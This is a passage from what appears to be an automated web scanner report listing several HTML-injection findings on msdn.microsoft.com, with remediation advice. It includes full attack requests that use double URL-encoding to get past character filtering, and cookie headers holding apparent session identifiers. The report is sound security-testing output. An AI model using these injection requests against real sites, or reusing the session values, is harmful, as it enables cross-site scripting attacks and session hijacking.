17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us66b35"><a>93ed8ded15d/library/ee702802" />
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f19%2522%253e%253ca%253e937c58c4d40 was submitted in the REST URL parameter 2. This input was echoed as a5f19"><a>937c58c4d40 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya5f19%2522%253e%253ca%253e937c58c4d40/ee702802.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya5f19"><a>937c58c4d40/ee702802" />
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc52%2522%253e%253ca%253edf492255170 was submitted in the REST URL parameter 3. This input was echoed as 7cc52"><a>df492255170 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee702802.aspx7cc52%2522%253e%253ca%253edf492255170 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee702802.aspx7cc52"><a>df492255170" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e1%2522%253e%253ca%253e80d9957f887 was submitted in the REST URL parameter 1. This input was echoed as aa9e1"><a>80d9957f887 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usaa9e1%2522%253e%253ca%253e80d9957f887/library/ee721044.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:36 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usaa9e1"><a>80d9957f887/library/ee721044" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2341c%2522%253e%253ca%253efc838b46606 was submitted in the REST URL parameter 2. This input was echoed as 2341c"><a>fc838b46606 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2341c%2522%253e%253ca%253efc838b46606/ee721044.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2341c"><a>fc838b46606/ee721044" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0813%2522%253e%253ca%253e5bed963aadc was submitted in the REST URL parameter 3. This input was echoed as a0813"><a>5bed963aadc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee721044.aspxa0813%2522%253e%253ca%253e5bed963aadc HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:01 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee721044.aspxa0813"><a>5bed963aadc" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36289%2522%253e%253ca%253eae7249556c5 was submitted in the REST URL parameter 1. This input was echoed as 36289"><a>ae7249556c5 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us36289%2522%253e%253ca%253eae7249556c5/library/ee725279.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:12:48 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us36289"><a>ae7249556c5/library/ee725279" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e35f%2522%253e%253ca%253e9fb18031369 was submitted in the REST URL parameter 2. This input was echoed as 9e35f"><a>9fb18031369 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library9e35f%2522%253e%253ca%253e9fb18031369/ee725279.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 